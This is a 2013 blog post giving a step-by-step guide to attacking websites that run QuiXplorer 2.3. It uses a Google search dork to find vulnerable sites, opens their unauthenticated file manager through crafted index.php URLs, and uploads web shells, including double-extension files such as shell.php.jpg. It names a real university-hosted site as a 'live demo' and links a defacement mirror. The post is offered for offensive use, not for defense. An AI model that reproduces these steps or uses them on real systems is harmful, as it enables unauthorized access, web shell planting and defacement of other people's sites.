Friday 19 April 2013

QuiXplorer 2.3


open Google.com and type this dork
intitle:"QuiXplorer 2.3 - the QuiX project"



you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity




http://[localhost]/[path]/index.php?action=list&order=name&srt=yes





http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager
you can upload your files here


find this edit file create file etc icons in page and click on last, its upload option







You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example :
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
 Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
Live demo :
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/
i know some asshole will chnage the deface
so its mirrOr of defacements http://attack-h.org/attack/?id=8452

0 comments:

Post a Comment